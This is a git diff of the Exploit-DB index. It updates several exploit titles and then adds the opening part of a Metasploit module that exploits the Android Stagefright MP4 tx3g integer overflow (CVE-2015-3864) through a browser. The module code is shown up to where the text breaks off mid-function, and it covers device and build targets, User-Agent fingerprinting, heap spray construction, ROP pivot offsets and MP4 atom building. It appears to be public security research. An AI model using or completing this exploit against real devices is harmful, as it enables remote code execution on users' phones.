id,file,description,date,author,platform,type,port 39086,platforms/php/webapps/39086.txt,"PhpSocial 2.0.0304_20222226 - Cross-Site Request Forgery",2015-12-23,"Curesec Research Team",php,webapps,80 39087,platforms/php/webapps/39087.txt,"Singapore 0.9.9b Beta - Image Gallery Remote File Inclusion / Cross-Site Scripting",2014-02-05,"TUNISIAN CYBER",php,webapps,0 39088,platforms/php/webapps/39088.txt,"Joomla! Plugin Projoom NovaSFH - 'upload.php' Arbitrary File Upload",2013-12-13,"Yuri Kramarz",php,webapps,0 -39089,platforms/hardware/remote/39089.txt,"NETGEAR D6300B - /diag.cgi IPAddr4 Parameter Remote Command Execution",2014-02-05,"Marcel Mangold",hardware,remote,0 +39089,platforms/hardware/remote/39089.txt,"Netgear D6300B - /diag.cgi IPAddr4 Parameter Remote Command Execution",2014-02-05,"Marcel Mangold",hardware,remote,0 39090,platforms/php/webapps/39090.php,"WordPress Theme Kiddo - Arbitrary File Upload",2014-02-05,"TUNISIAN CYBER",php,webapps,0 39091,platforms/php/dos/39091.pl,"WHMCS 5.12 - 'cart.php' Denial of Service",2014-02-07,Amir,php,dos,0 39092,platforms/php/dos/39092.pl,"phpBB 3.0.8 - Remote Denial of Service",2014-02-11,Amir,php,dos,0 @@ -35498,7 +35502,7 @@ id,file,description,date,author,platform,type,port 39161,platforms/windows/remote/39161.py,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)",2016-01-04,"Avinash Thapa",windows,remote,0 39162,platforms/multiple/dos/39162.txt,"pdfium CPDF_DIBSource::DownSampleScanline32Bit - Heap Based Out-of-Bounds Read",2016-01-04,"Google Security Research",multiple,dos,0 39163,platforms/multiple/dos/39163.txt,"pdfium CPDF_TextObject::CalcPositionData - Heap Based Out-of-Bounds Read",2016-01-04,"Google Security Research",multiple,dos,0 -39164,platforms/multiple/dos/39164.txt,"pdfium IsFlagSet (v8 memory management) - SIGSEGV",2016-01-04,"Google Security Research",multiple,dos,0 +39164,platforms/multiple/dos/39164.txt,"pdfium IsFlagSet (v8 memory management) - SIGSEGV Exploit",2016-01-04,"Google Security Research",multiple,dos,0 39165,platforms/multiple/dos/39165.txt,"pdfium CPDF_Function::Call - Stack Based Buffer Overflow",2016-01-04,"Google Security Research",multiple,dos,0 39166,platforms/linux/local/39166.c,"Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Privilege Escalation (1)",2016-01-05,rebel,linux,local,0 39167,platforms/php/webapps/39167.txt,"Online Airline Booking System - Multiple Vulnerabilities",2016-01-05,"Manish Tanwar",php,webapps,80 @@ -35735,7 +35739,7 @@ id,file,description,date,author,platform,type,port 39409,platforms/hardware/webapps/39409.txt,"D-Link DVG­N5402SP - Multiple Vulnerabilities",2016-02-04,"Karn Ganeshen",hardware,webapps,0 39410,platforms/php/webapps/39410.txt,"WordPress Plugin User Meta Manager 3.4.6 - Blind SQL Injection",2016-02-04,"Panagiotis Vagenas",php,webapps,80 39411,platforms/php/webapps/39411.txt,"WordPress Plugin User Meta Manager 3.4.6 - Privilege Escalation",2016-02-04,"Panagiotis Vagenas",php,webapps,80 -39412,platforms/hardware/webapps/39412.txt,"NETGEAR ProSafe Network Management System NMS300 - Multiple Vulnerabilities",2016-02-04,"Pedro Ribeiro",hardware,webapps,0 +39412,platforms/hardware/webapps/39412.txt,"Netgear ProSafe Network Management System NMS300 - Multiple Vulnerabilities",2016-02-04,"Pedro Ribeiro",hardware,webapps,0 39413,platforms/php/webapps/39413.txt,"UliCMS v9.8.1 - SQL Injection",2016-02-04,"Manuel García Cárdenas",php,webapps,80 39414,platforms/php/webapps/39414.txt,"OpenDocMan 1.3.4 - Cross-Site Request Forgery",2016-02-04,"Curesec Research Team",php,webapps,80 39415,platforms/php/webapps/39415.txt,"ATutor 2.2 - Multiple Cross-Site Scripting Vulnerabilities",2016-02-04,"Curesec Research Team",php,webapps,80 @@ -35788,7 +35792,7 @@ id,file,description,date,author,platform,type,port 39467,platforms/multiple/dos/39467.txt,"Adobe Flash - BitmapData.drawWithQuality Heap Overflow",2016-02-17,"Google Security Research",multiple,dos,0 39468,platforms/php/webapps/39468.txt,"Vesta Control Panel 0.9.8-15 - Persistent Cross-Site Scripting",2016-02-18,"Necmettin COSKUN",php,webapps,0 39469,platforms/php/webapps/39469.txt,"DirectAdmin 1.491 - Cross-Site Request Forgery",2016-02-18,"Necmettin COSKUN",php,webapps,0 -39470,platforms/windows/dos/39470.py,"XM Easy Personal FTP Server 5.8 - (HELP) Remote Denial of Service",2016-02-19,"Pawan Lal",windows,dos,0 +39470,platforms/windows/dos/39470.py,"XM Easy Personal FTP Server 5.8.0 - 'HELP' Remote Denial of Service",2016-02-19,"Pawan Lal",windows,dos,0 39471,platforms/windows/dos/39471.txt,"STIMS Buffer 1.1.20 - Buffer Overflow SEH (Denial of Service)",2016-02-19,"Shantanu Khandelwal",windows,dos,0 39472,platforms/windows/dos/39472.txt,"STIMS Cutter 1.1.3.20 - Buffer Overflow Denial of Service",2016-02-19,"Shantanu Khandelwal",windows,dos,0 39473,platforms/php/webapps/39473.txt,"Chamilo LMS IDOR - (messageId) Delete POST Inject",2016-02-19,Vulnerability-Lab,php,webapps,0 @@ -35831,7 +35835,7 @@ id,file,description,date,author,platform,type,port 39512,platforms/windows/dos/39512.txt,"Viscomsoft Calendar Active-X 2.0 - Multiple Crash PoCs",2016-03-01,"Shantanu Khandelwal",windows,dos,0 39513,platforms/php/webapps/39513.txt,"WordPress Plugin CP Polls 1.0.8 - Multiple Vulnerabilities",2016-03-01,"i0akiN SEC-LABORATORY",php,webapps,80 39514,platforms/php/remote/39514.rb,"ATutor 2.2.1 - SQL Injection / Remote Code Execution (Metasploit)",2016-03-01,Metasploit,php,remote,80 -39515,platforms/windows/remote/39515.rb,"NETGEAR ProSafe Network Management System 300 - Arbitrary File Upload (Metasploit)",2016-03-01,Metasploit,windows,remote,8080 +39515,platforms/windows/remote/39515.rb,"Netgear ProSafe Network Management System 300 - Arbitrary File Upload (Metasploit)",2016-03-01,Metasploit,windows,remote,8080 39516,platforms/windows/dos/39516.py,"Quick Tftp Server Pro 2.3 - Read Mode Denial of Service",2016-03-02,"Guillaume Kaddouch",windows,dos,69 39517,platforms/windows/dos/39517.py,"FreeProxy Internet Suite 4.10 - Denial of Service",2016-03-02,"Guillaume Kaddouch",windows,dos,8080 39518,platforms/windows/dos/39518.txt,"PictureTrails Photo Editor GE.exe 2.0.0 - '.bmp' Crash (PoC)",2016-03-02,redknight99,windows,dos,0 @@ -35932,7 +35936,7 @@ id,file,description,date,author,platform,type,port 39623,platforms/php/webapps/39623.txt,"WordPress Plugin Photocart Link 1.6 - Local File Inclusion",2016-03-27,CrashBandicot,php,webapps,80 39624,platforms/lin_x86-64/shellcode/39624.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (25 bytes)",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0 39625,platforms/lin_x86-64/shellcode/39625.c,"Linux/x86-64 - execve(/bin/bash) Shellcode (33 bytes)",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0 -39627,platforms/windows/dos/39627.py,"TallSoft SNMP TFTP Server 1.0.0 - Denial of Service",2016-03-28,"Charley Celice",windows,dos,69 +39627,platforms/windows/dos/39627.py,"TallSoft SNMP/TFTP Server 1.0.0 - Denial of Service",2016-03-28,"Charley Celice",windows,dos,69 39628,platforms/linux/local/39628.txt,"FireEye - Malware Input Processor (uid=mip) Privilege Escalation",2016-03-28,"Google Security Research",linux,local,0 39629,platforms/android/dos/39629.txt,"Android One - mt_wifi IOCTL_GET_STRUCT Privilege Escalation",2016-03-28,"Google Security Research",android,dos,0 39630,platforms/windows/local/39630.g,"Cogent Datahub 7.3.9 Gamma Script - Elevation of Privilege",2016-03-28,mr_me,windows,local,0 @@ -35944,7 +35948,7 @@ id,file,description,date,author,platform,type,port 39637,platforms/php/webapps/39637.txt,"CubeCart 6.0.10 - Multiple Vulnerabilities",2016-03-30,"High-Tech Bridge SA",php,webapps,80 39638,platforms/linux/dos/39638.txt,"Kamailio 4.3.4 - Heap Based Buffer Overflow",2016-03-30,"Stelios Tsampas",linux,dos,0 39639,platforms/php/remote/39639.rb,"ATutor 2.2.1 - Directory Traversal / Remote Code Execution (Metasploit)",2016-03-30,Metasploit,php,remote,80 -39640,platforms/android/remote/39640.txt,"Metaphor - Stagefright Exploit with ASLR Bypass",2016-03-30,NorthBit,android,remote,0 +39640,platforms/android/remote/39640.txt,"Android 5.0.1 - Metaphor Stagefright Exploit (ASLR Bypass)",2016-03-30,NorthBit,android,remote,0 39641,platforms/hardware/webapps/39641.html,"MOBOTIX Video Security Cameras - Cross-Site Request Forgery (Add Admin)",2016-03-31,LiquidWorm,hardware,webapps,80 39642,platforms/linux/webapps/39642.txt,"Apache OpenMeetings 1.9.x < 3.1.0 - '.ZIP' File Directory Traversal",2016-03-31,"Andreas Lindh",linux,webapps,5080 39643,platforms/java/remote/39643.rb,"Apache Jetspeed - Arbitrary File Upload (Metasploit)",2016-03-31,Metasploit,java,remote,8080 @@ -36226,7 +36230,7 @@ id,file,description,date,author,platform,type,port 39934,platforms/php/webapps/39934.txt,"Dream Gallery 2.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80 39935,platforms/php/webapps/39935.txt,"Grid Gallery 1.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80 39936,platforms/php/webapps/39936.txt,"Joomla! Extension PayPlans (com_payplans) 3.3.6 - SQL Injection",2016-06-13,"Persian Hack Team",php,webapps,80 -39937,platforms/php/webapps/39937.py,"Zabbix 2.2 < 3.0.3 - Remote Code Execution with API JSON-RPC",2016-06-13,"Alexander Gurin",php,webapps,80 +39937,platforms/php/webapps/39937.py,"Zabbix 2.2 < 3.0.3 - API JSON-RPC Remote Code Execution",2016-06-13,"Alexander Gurin",php,webapps,80 39938,platforms/linux/local/39938.rb,"iSQL 1.0 - Shell Command Injection",2016-06-13,HaHwul,linux,local,0 39939,platforms/linux/dos/39939.rb,"iSQL 1.0 - isql_main.c Buffer Overflow (PoC)",2016-06-13,HaHwul,linux,dos,0 39940,platforms/linux/dos/39940.txt,"Foxit PDF Reader 1.0.1.0925 - CPDF_StreamContentParser::~CPDF_StreamContentParser Heap Based Memory Corruption",2016-06-13,"Google Security Research",linux,dos,0 @@ -36416,6 +36420,7 @@ id,file,description,date,author,platform,type,port 40165,platforms/cgi/webapps/40165.txt,"Iris ID IrisAccess ICU 7000-2 - Multiple Vulnerabilities",2016-07-26,LiquidWorm,cgi,webapps,80 40166,platforms/cgi/webapps/40166.txt,"Iris ID IrisAccess ICU 7000-2 - Remote Root Command Execution",2016-07-26,LiquidWorm,cgi,webapps,80 40167,platforms/linux/remote/40167.txt,"Iris ID IrisAccess iCAM4000/iCAM7000 - Hardcoded Credentials Remote Shell Access",2016-07-26,LiquidWorm,linux,remote,23 +40168,platforms/php/webapps/40168.txt,"Open Upload 0.4.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2016-07-27,"Vinesh Redkar",php,webapps,80 40169,platforms/linux/local/40169.txt,"VMware - Setuid VMware-mount Popen lsb_release Privilege Escalation (VMSA-2013-0010)",2013-08-22,"Tavis Ormandy",linux,local,0 40170,platforms/python/remote/40170.rb,"Centreon 2.5.3 - Web Useralias Command Execution (Metasploit)",2016-07-27,Metasploit,python,remote,80 40172,platforms/windows/local/40172.py,"VUPlayer 2.49 - '.pls' Stack Buffer Overflow (DEP Bypass)",2016-07-29,vportal,windows,local,0 @@ -36439,7 +36444,7 @@ id,file,description,date,author,platform,type,port 40197,platforms/multiple/dos/40197.txt,"Wireshark 2.0.0 < 2.0.4 / 1.12.0 < 1.12.12 - PacketBB Dissector Denial of Service",2016-08-03,"Chris Benedict",multiple,dos,0 40198,platforms/multiple/dos/40198.txt,"Wireshark 2.0.0 < 2.0.4 / 1.12.0 < 1.12.12 - WSP Dissector Denial of Service",2016-08-03,"Chris Benedict",multiple,dos,0 40199,platforms/multiple/dos/40199.txt,"Wireshark 2.0.0 < 2.0.4 / 1.12.0 < 1.12.12 - RLC Dissector Denial of Service",2016-08-03,"Antti Levomäki",multiple,dos,0 -40200,platforms/hardware/remote/40200.txt,"NUUO NVRmini2 / NVRsolo / Crystal Devices and NETGEAR ReadyNAS Surveillance Application - Multiple Vulnerabilities",2016-08-05,"Pedro Ribeiro",hardware,remote,0 +40200,platforms/hardware/remote/40200.txt,"NUUO NVRmini2 / NVRsolo / Crystal Devices / Netgear ReadyNAS Surveillance Application - Multiple Vulnerabilities",2016-08-05,"Pedro Ribeiro",hardware,remote,0 40201,platforms/linux/remote/40201.txt,"ntop/nbox 2.3 <= 2.5 - Multiple Vulnerabilities",2016-08-05,"Javier Marcos",linux,remote,0 40202,platforms/php/webapps/40202.txt,"Subrion CMS 4.0.5 - SQL Injection",2016-08-05,Vulnerability-Lab,php,webapps,80 40203,platforms/linux/local/40203.py,"zFTP Client 20061220 - 'Connection Name' Local Buffer Overflow",2016-08-05,"Juan Sacco",linux,local,0 @@ -36470,10 +36475,10 @@ id,file,description,date,author,platform,type,port 40229,platforms/jsp/webapps/40229.txt,"WebNMS Framework Server 5.2 / 5.2 SP1 - Multiple Vulnerabilities",2016-08-10,"Pedro Ribeiro",jsp,webapps,0 40230,platforms/linux/dos/40230.txt,"SAP SAPCAR - Multiple Vulnerabilities",2016-08-10,"Core Security",linux,dos,0 40231,platforms/java/webapps/40231.txt,"ColoradoFTP 1.3 Prime Edition (Build 8) - Directory Traversal",2016-08-11,Rv3Laboratory,java,webapps,80 -40232,platforms/linux/remote/40232.py,"FreePBX 13 / 14 - Remote Command Execution With Privilege Escalation",2016-08-12,pgt,linux,remote,0 +40232,platforms/linux/remote/40232.py,"FreePBX 13 / 14 - Remote Command Execution / Privilege Escalation",2016-08-12,pgt,linux,remote,0 40280,platforms/windows/remote/40280.py,"Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050)",2016-02-26,ohnozzy,windows,remote,0 40281,platforms/cgi/webapps/40281.txt,"Vanderbilt IP-Camera CCPW3025-IR / CVMW3025-IR - Local File Disclosure",2016-08-22,"Yakir Wizman",cgi,webapps,0 -40234,platforms/windows/remote/40234.py,"Easy FTP Server 1.7.0.11 - 'APPE' Command Buffer Overflow Remote Exploit",2012-03-03,Swappage,windows,remote,0 +40234,platforms/windows/remote/40234.py,"EasyFTP Server 1.7.0.11 - 'APPE' Command Buffer Overflow Remote Exploit",2012-03-03,Swappage,windows,remote,0 40279,platforms/windows/remote/40279.py,"Microsoft Windows - NetAPI32.dll Code Execution (Python) (MS08-067)",2016-02-26,ohnozzy,windows,remote,0 40235,platforms/hardware/remote/40235.py,"Samsung Smart Home Camera SNH-P-6410 - Command Injection",2016-08-14,PentestPartners,hardware,remote,0 40236,platforms/ruby/webapps/40236.txt,"GitLab - 'impersonate' Feature Privilege Escalation",2016-08-15,Kaimi,ruby,webapps,80 @@ -36553,3 +36558,4 @@ id,file,description,date,author,platform,type,port 40328,platforms/jsp/webapps/40328.html,"ZKTeco ZKAccess Security System 5.3.1 - Persistent Cross-Site Scripting",2016-08-31,LiquidWorm,jsp,webapps,8088 40329,platforms/php/dos/40329.php,"PHP 7.0 - JsonSerializable::jsonSerialize json_encode Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0 40330,platforms/windows/local/40330.py,"FortiClient SSLVPN 5.4 - Credentials Disclosure",2016-09-01,"Viktor Minin",windows,local,0 +40436,platforms/android/remote/40436.rb,"Android 5.0 <= 5.1.1 - Stagefright .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,android,remote,0 diff --git a/platforms/android/remote/40436.rb b/platforms/android/remote/40436.rb new file mode 100755 index 000000000..376e9f010 --- /dev/null +++ b/platforms/android/remote/40436.rb @@ -0,0 +1,1212 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::RopDb + + def initialize(info={}) + super(update_info(info, + 'Name' => "Android Stagefright MP4 tx3g Integer Overflow", + 'Description' => %q{ + This module exploits a integer overflow vulnerability in the Stagefright + Library (libstagefright.so). The vulnerability occurs when parsing specially + crafted MP4 files. While a wide variety of remote attack vectors exist, this + particular exploit is designed to work within an HTML5 compliant browser. + + Exploitation is done by supplying a specially crafted MP4 file with two + tx3g atoms that, when their sizes are summed, cause an integer overflow when + processing the second atom. As a result, a temporary buffer is allocated + with insufficient size and a memcpy call leads to a heap overflow. + + This version of the exploit uses a two-stage information leak based on + corrupting the MetaData that the browser reads from mediaserver. This method + is based on a technique published in NorthBit's Metaphor paper. First, + we use a variant of their technique to read the address of a heap buffer + located adjacent to a SampleIterator object as the video HTML element's + videoHeight. Next, we read the vtable pointer from an empty Vector within + the SampleIterator object using the video element's duration. This gives + us a code address that we can use to determine the base address of + libstagefright and construct a ROP chain dynamically. + + NOTE: the mediaserver process on many Android devices (Nexus, for example) is + constrained by SELinux and thus cannot use the execve system call. To avoid + this problem, the original exploit uses a kernel exploit payload that disables + SELinux and spawns a shell as root. Work is underway to make the framework + more amenable to these types of situations. Until that work is complete, this + exploit will only yield a shell on devices without SELinux or with SELinux in + permissive mode. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + # Exodus/jordan # initial discovery / disclosure + 'jduck', # Metasploit module, further infoleak development + 'NorthBit' # intiial information leak implementation + ], + 'References' => + [ + [ 'CVE', '2015-3864' ], + [ 'URL', 'https://blog.exodusintel.com/2015/08/13/stagefright-mission-accomplished/' ], + [ 'URL', 'http://googleprojectzero.blogspot.com/2015/09/stagefrightened.html' ], + [ 'URL', 'https://raw.githubusercontent.com/NorthBit/Public/master/NorthBit-Metaphor.pdf' ], + [ 'URL', 'https://github.com/NorthBit/Metaphor' ], + # Not used, but related + [ 'URL', 'http://drops.wooyun.org/papers/7558' ], + [ 'URL', 'http://translate.wooyun.io/2015/08/08/Stagefright-Vulnerability-Disclosure.html' ], + [ 'URL', 'https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/2016/01/libstagefright-exploit-notespdf/' ], + ], + 'Payload' => + { + 'Space' => 2048, + 'DisableNops' => true, + }, + #'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/mettle/reverse_tcp' }, + 'Platform' => 'linux', + 'Arch' => [ARCH_ARMLE], # TODO: , ARCH_X86, ARCH_X86_64, ARCH_MIPSLE], + 'Targets' => + [ + [ 'Automatic', {} ], + # + # Each target includes information about the device, firmware, and + # how exactly to about exploiting it. + # + # Primarily, these targets are used to map a browser's User-Agent to + # exploit specifics for that device / build. + # + [ + 'Nexus 7 (Wi-Fi) (razor) with Android 5.0 (LRX21P)', + { + 'Model' => 'Nexus 7', + 'Build' => 'LRX21P', + 'Release' => '5.0', + 'Rop' => 'lrx', + 'SprayAddress' => 0xb1508000 + } + ], + [ + 'Nexus 7 (Wi-Fi) (razor) with Android 5.0.1 (LRX22C)', + { + 'Model' => 'Nexus 7', + 'Build' => 'LRX22C', + 'Release' => '5.0.1', + 'Rop' => 'lrx' + } + ], + [ + 'Nexus 7 (Wi-Fi) (razor) with Android 5.0.2 (LRX22G)', + { + 'Model' => 'Nexus 7', + 'Build' => 'LRX22G', + 'Release' => '5.0.2', + 'Rop' => 'lrx' + } + ], + [ + 'Nexus 7 (Wi-Fi) (razor) with Android 5.1 (LMY47O)', + { + 'Model' => 'Nexus 7', + 'Build' => 'LMY47O', + 'Release' => '5.1', + 'Rop' => 'lmy-1' + } + ], + [ + 'Nexus 7 (Wi-Fi) (razor) with Android 5.1.1 (LMY47V)', + { + 'Model' => 'Nexus 7', + 'Build' => 'LMY47V', + 'Release' => '5.1.1', + 'Rop' => 'lmy-1' + } + ], + [ + 'Nexus 7 (Wi-Fi) (razor) with Android 5.1.1 (LMY48G)', + { + 'Model' => 'Nexus 7', + 'Build' => 'LMY48G', + 'Release' => '5.1.1', + 'Rop' => 'lmy-1' + } + ], + [ + 'Nexus 7 (Wi-Fi) (razor) with Android 5.1.1 (LMY48I)', + { + 'Model' => 'Nexus 7', + 'Build' => 'LMY48I', + 'Release' => '5.1.1', + 'Rop' => 'lmy-2' + } + ], + [ + 'Nexus 7 (Mobile) (razorg) with Android 5.0.2 (LRX22G)', + { + 'Model' => 'Nexus 7', + 'Build' => 'LRX22G', + 'Release' => '5.0.2', + 'Rop' => 'lrx' + } + ], + [ + 'Nexus 7 (Mobile) (razorg) with Android 5.1 (LMY47O)', + { + 'Model' => 'Nexus 7', + 'Build' => 'LMY47O', + 'Release' => '5.1', + 'Rop' => 'lmy-1' + } + ], + [ + 'Nexus 7 (Mobile) (razorg) with Android 5.1.1 (LMY47V)', + { + 'Model' => 'Nexus 7', + 'Build' => 'LMY47V', + 'Release' => '5.1.1', + 'Rop' => 'lmy-1' + } + ], + [ + 'Nexus 5 (hammerhead) with Android 5.0 (LRX21O)', + { + 'Model' => 'Nexus 5', + 'Build' => 'LRX21O', + 'Release' => '5.0', + 'Rop' => 'lrx' + } + ], + [ + 'Nexus 5 (hammerhead) with Android 5.0.1 (LRX22C)', + { + 'Model' => 'Nexus 5', + 'Build' => 'LRX22C', + 'Release' => '5.0.1', + 'Rop' => 'lrx' + } + ], + [ + 'Nexus 5 (hammerhead) with Android 5.1 (LMY47D)', + { + 'Model' => 'Nexus 5', + 'Build' => 'LMY47D', + 'Release' => '5.1', + 'Rop' => 'lmy-1' + } + ], + [ + 'Nexus 5 (hammerhead) with Android 5.1 (LMY47I)', + { + 'Model' => 'Nexus 5', + 'Build' => 'LMY47I', + 'Release' => '5.1', + 'Rop' => 'lmy-1' + } + ], + [ + 'Nexus 5 (hammerhead) with Android 5.1.1 (LMY48B)', + { + 'Model' => 'Nexus 5', + 'Build' => 'LMY48B', + 'Release' => '5.1.1', + 'Rop' => 'lmy-1' + } + ], + [ + 'Nexus 5 (hammerhead) with Android 5.1.1 (LMY48I)', + { + 'Model' => 'Nexus 5', + 'Build' => 'LMY48I', + 'Release' => '5.1.1', + 'Rop' => 'lmy-2' + } + ], + [ + 'Nexus 6 (shamu) with Android 5.0 (LRX21O)', + { + 'Model' => 'Nexus 6', + 'Build' => 'LRX21O', + 'Release' => '5.0', + 'Rop' => 'lrx' + } + ], + [ + 'Nexus 6 (shamu) with Android 5.0.1 (LRX22C)', + { + 'Model' => 'Nexus 6', + 'Build' => 'LRX22C', + 'Release' => '5.0.1', + 'Rop' => 'lrx' + } + ], + [ + 'Nexus 6 (shamu) with Android 5.1 (LMY47D)', + { + 'Model' => 'Nexus 6', + 'Build' => 'LMY47D', + 'Release' => '5.1', + 'Rop' => 'lmy-1' + } + ], + [ + 'Nexus 6 (shamu) with Android 5.1 (LMY47E)', + { + 'Model' => 'Nexus 6', + 'Build' => 'LMY47E', + 'Release' => '5.1', + 'Rop' => 'lmy-1' + } + ], + [ + 'Nexus 6 (shamu) with Android 5.1 (LMY47I)', + { + 'Model' => 'Nexus 6', + 'Build' => 'LMY47I', + 'Release' => '5.1', + 'Rop' => 'lmy-1' + } + ], + [ + 'Nexus 6 (shamu) with Android 5.1.1 (LYZ28E)', + { + 'Model' => 'Nexus 6', + 'Build' => 'LYZ28E', + 'Release' => '5.1.1', + 'Rop' => 'shamu / LYZ28E' + } + ], + [ + 'Nexus 6 (shamu) with Android 5.1 (LMY47M)', + { + 'Model' => 'Nexus 6', + 'Build' => 'LMY47M', + 'Release' => '5.1', + 'Rop' => 'lmy-1' + } + ], + [ + 'Nexus 6 (shamu) with Android 5.1.1 (LMY47Z)', + { + 'Model' => 'Nexus 6', + 'Build' => 'LMY47Z', + 'Release' => '5.1.1', + 'Rop' => 'lmy-1' + } + ], + [ + 'Nexus 6 (shamu) with Android 5.1.1 (LVY48C)', + { + 'Model' => 'Nexus 6', + 'Build' => 'LVY48C', + 'Release' => '5.1.1', + 'Rop' => 'lmy-1' + } + ], + [ + 'Nexus 6 (shamu) with Android 5.1.1 (LMY48I)', + { + 'Model' => 'Nexus 6', + 'Build' => 'LMY48I', + 'Release' => '5.1.1', + 'Rop' => 'lmy-2' + } + ], + [ + 'Nexus 6 (shamu) with Android 5.1.1 (LYZ28J)', + { + 'Model' => 'Nexus 6', + 'Build' => 'LYZ28J', + 'Release' => '5.1.1', + 'Rop' => 'shamu / LYZ28J' + } + ], + [ + 'Nexus 6 (shamu) with Android 5.1.1 (LVY48E)', + { + 'Model' => 'Nexus 6', + 'Build' => 'LVY48E', + 'Release' => '5.1.1', + 'Rop' => 'lmy-2' + } + ], + [ + 'Samsung Galaxy S5 (VZW SM-G900V) with Android 5.0 (LRX21T)', + { + 'Model' => 'SM-G900V', + 'Build' => 'LRX21T', + 'Release' => '5.0', + 'Rop' => 'sm-g900v / OE1', + 'SprayAddress' => 0xaf008000, + 'SampleIteratorSize' => 0xa8, + 'VectorSize' => 0xec + } + ] + ], + 'Privileged' => true, + 'DisclosureDate' => "Aug 13 2015", + 'DefaultTarget' => 0)) + +=begin + register_options( + [ + OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) + ], self.class) +=end + end + + def exploit + @peers = {} + super + end + + def get_target(request) + agent = request.headers['User-Agent'] + self.targets.each do |t| + next if t.name == 'Automatic' + regexp = Regexp.escape("Linux; Android #{t['Release']}; #{t['Model']} Build/#{t['Build']}") + return t if (agent =~ /#{regexp}/) + end + return nil + end + + # + # Construct a page worth of data that we'll spray + # + # NOTE: The data within is target-specific + # + def build_spray(my_target, peer, spray_addr) + # Initialize the page to a reasonable state. + page = '' + page = rand_text(4096) + + # Load target-based exploit-specific variables + details = get_details(my_target) + return nil if details.nil? + + # Calculate the libstagefright.so base address + vector_rva = details['VectorRVA'] + vector_ptr = peer[:vector_vtable_addr] + libsf_base = (vector_ptr & 0xfffff000) - (vector_rva & 0xfffff000) + + # If we smash mDataSource, this ends up controlling the program counter!! +=begin + 0xb65fd7c4 : ldr r2, [r0, #0] + 0xb65fd7c6 : str r1, [sp, #0] + 0xb65fd7c8 : ldr r5, [r7, #0] + 0xb65fd7ca : str r5, [sp, #4] + 0xb65fd7cc : ldr r6, [r2, #28] + 0xb65fd7ce : ldrd r2, r3, [r10] + 0xb65fd7d2 : blx r6 + 0xb65fd7d4 : ldrd r2, r3, [sp, #64] ; 0x40 +=end + + # Initialize our pivot values and adjust them to libstagefright's base. + # First, load r0 (pointer to our buffer) into some register.. + mds_pivot1 = libsf_base + details['Pivot1'] + + # Next, load sp (and probably other stuff) from there + mds_pivot2 = libsf_base + details['Pivot2'] + + # Finally, skip over some stuff and kick of the ROP chain + mds_adjust = libsf_base + details['Adjust'] + + # The offset to the ROP change beginning + rop_start_off = 0x30 + + # Point sp to the remainder of the ROP chain + new_sp = spray_addr + rop_start_off + + # Sometimes the spray isn't aligned perfectly, this fixes that situation... + unalign_off = 0x998 + new_sp2 = new_sp + 0x1000 - unalign_off + + # This pointer should point to the beginning of the shellcode payload + payload_ptr = spray_addr + 0xa0 + + # Put the stack back! + stack_fix = "\x0a\xd0\xa0\xe1" # mov sp, r10 ; restore original sp + + # Depending on the pivot strategy in use, we have to set things up slightly + # differently... + # + # In each case, we use a two-stage pivot that reads the spray address from + # r0 (we smashed that, remember). + # + # The addroffs array is used to map values to the offsets where the pivots + # expect them to be. + # + case details['PivotStrategy'] + when 'lrx' + addroffs = [ + [ 0x0, new_sp ], + [ 0x10, mds_pivot2 ], + [ 0x1c, mds_pivot1 ], + ] + + # Since we are only popping one item in pivot2, we reduce the rop_start_off + rop_start_off -= 4 + + # Adjust the payload pointer + payload_ptr -= 4 + + when 'lmy-1' + addroffs = [ + [ 0x8, new_sp ], + [ 0xc, mds_adjust ], + [ 0x10, mds_pivot2 ], + [ 0x1c, mds_pivot1 ] + ] + + when 'lmy-2' + ptr_to_mds_pivot2 = spray_addr + 0x10 - 0x18 # adjust for displacement + addroffs = [ + [ 0x0, ptr_to_mds_pivot2 ], + [ 0x8, new_sp ], + [ 0xc, mds_adjust ], + [ 0x10, mds_pivot2 ], + [ 0x1c, mds_pivot1 ] + ] + + stack_fix = "\x09\xd0\xa0\xe1" # mov sp, r9 ; restore original sp + + when 'lyz' + ptr_to_mds_pivot2 = spray_addr + 0x8 + addroffs = [ + [ 0x0, ptr_to_mds_pivot2 ], + [ 0x8, mds_pivot2 ], + [ 0x1c, mds_pivot1 ], + [ 0x24, new_sp ], + # lr is at 0x28! + [ 0x2c, mds_adjust ] + ] + + # We can't fix it becuse we don't know where the original stack is anymore :-/ + stack_fix = "" + + when 'sm-g900v' + addroffs = [ + [ 0x4, mds_adjust ], + [ 0x10, new_sp ], + [ 0x1c, mds_pivot1 ], + [ 0x20, mds_pivot2 ] + ] + + else + print_error("ERROR: PivotStrategy #{details['PivotStrategy']} is not implemented yet!") + return nil + end + + # We need our ROP to build the page... Create it. + rop = generate_rop_payload('stagefright', stack_fix + payload.encoded, {'base' => libsf_base, 'target' => my_target['Rop'] }) + + # Fix up the payload pointer in the ROP + idx = rop.index([ 0xc600613c ].pack('V')) + rop[idx, 4] = [ payload_ptr ].pack('V') + + # Insert the ROP + page[rop_start_off, rop.length] = rop + + # Insert the special values... + addroffs.each do |ao| + off,addr = ao + page[off,4] = [ addr ].pack('V') + + # Sometimes the spray isn't aligned perfectly... + if addr == new_sp + page[off+unalign_off,4] = [ new_sp2 ].pack('V') + else + page[off+unalign_off,4] = [ addr ].pack('V') + end + end + + page + end + + # + # MPEG-4 specific functionality + # + def get_atom(tag, data='', length=nil) + if tag.length != 4 + raise 'Yo! They call it "FourCC" for a reason.' + end + + length ||= data.length + 8 + if length >= 2**32 + return [ 